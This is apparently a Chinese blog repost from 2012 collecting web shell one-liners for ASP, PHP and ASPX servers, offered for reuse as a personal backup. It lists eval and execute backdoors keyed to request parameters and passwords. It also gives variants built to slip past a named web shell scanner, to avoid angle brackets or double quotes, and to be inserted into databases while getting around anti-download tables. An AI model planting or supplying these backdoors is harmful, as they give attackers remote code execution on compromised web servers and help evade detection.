备份专用一句话

2012-8-5 王健宇 转载

备份专用

<%eval(request(“a”)):response.end%>
 
%><%eval(request(chr(35)))%><%'
asp一句话
<%execute(request(“1″))%>

php一句话
<?php eval($_POST[1]);?>

aspx一句话
<script runat=”server”>
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y(“add6bb58e139be10″);
</script>


可以躲过雷客图的一句话。
<%
set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)
ms.Language=”VBScript”
ms.AddObject “Response”, Response
ms.AddObject “request”, request
ms.ExecuteStatement(“ev”&”al(request(“”1″”))”)
%>

不用’<,>’的asp一句话
<script runat=server>execute request(“1″)</script>

不用双引号的一句话。
<%eval request(chr(35))%>

 
插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
<%execute request("value")%><%'<% loop <%:%>
<%'<% loop <%:%><%execute request("value")%>
<%execute request("value")'<% loop <%:%>
 
 
 
~┼攠數畣整爠煥敵瑳∨≡┩>  密码a
┼癥污爠煥敵瑳∨∣┩愾 密码#

标签: 备份专用一句话

发表评论:

Powered by emlog sitemap